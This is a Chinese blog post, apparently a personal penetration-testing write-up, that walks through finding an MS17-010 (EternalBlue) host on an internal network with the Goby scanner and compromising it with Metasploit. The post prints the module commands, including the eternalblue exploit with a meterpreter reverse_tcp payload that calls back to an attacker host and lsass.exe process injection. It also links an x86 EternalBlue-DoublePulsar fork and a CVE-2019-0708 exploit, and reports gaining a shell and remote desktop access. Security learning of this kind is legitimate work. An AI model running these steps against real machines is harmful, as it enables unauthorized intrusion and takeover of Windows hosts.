ms17-010永恒之蓝的漏洞利用


ms17-010永恒之蓝的漏洞利用

0x00 前言

最近疫情严重,上班时间一拖再拖,在家学习的时候发现了goby,用于用于监控网络 IT 资产,

昨日复工,正好可以试用一下,扫描一下内网资产


补充个0708的 https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows


0x01 Goby简介

分析目标网络IT资产的规则来建立知识库,可以在发生安全事件时在最短时间内管理安全紧急情况。与传统的端口扫描和漏洞扫描不同,Goby仅在较小的受影响区域处理漏洞紧急情况,因此此方法最快,对目标网络的影响最小


官网下载https://gobies.org/ 安装试用

设置扫描任务

ms17-010永恒之蓝的漏洞利用


期间发现了一台主机可能有永恒之蓝,遂打之


0x02 msf--ms17-010

扫描确认

攻击机 kali linux

靶机 10.118.72.111

工具 metasploit


nmap扫描靶机端口,确定445端口开启


<code>msfconsole #进入msfmsf >search ms17-010 #查看相关模块msf > use auxiliary/scanner/smb/smb_ms17_010msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.118.72.111msf auxiliary(scanner/smb/smb_ms17_010) > exploit /<code>


确认 vulnerable!

ms17-010永恒之蓝的漏洞利用


说明主机10.118.72.111存在MS17-010漏洞


漏洞攻击


下面使用攻击模块


<code>msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.118.72.111rhost => 10.118.72.111msf exploit(windows/smb/ms17_010_eternalblue) > set lhost xxxlhost => xxxmsf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) >/<code>


但是。。。没打成功


后面找到了参考https://laucyun.com/a6cb3c752b0fc10f0a9eeef01f7a5f76.html


x86平台下失败的解决方法

msf自带的利用模块只针对x64版本的操作系统,而对于x86版本的系统却失效,可以使用https://git.laucyun.com/security/Eternalblue-Doublepulsar-Metasploit.git来解决


最后的配置是

ms17-010永恒之蓝的漏洞利用


ms17-010永恒之蓝的漏洞利用


oh 当时还修改了一个 set PROCESSINJECT lsass.exe


就成功拿下

ms17-010永恒之蓝的漏洞利用


ms17-010永恒之蓝的漏洞利用


3389端口开启


ms17-010永恒之蓝的漏洞利用


远程登录成功!


其他资料


ms17010这个问题其实比较难,看到好资料先收藏起来,以便以后攻防使用


https://mp.weixin.qq.com/s/EoHB02qOscZsj3cNS40Rsw


由于内网渗透经验不足,因此还在摸索,大家可以提一下下一步渗透建议哈!


分享到:


相關文章: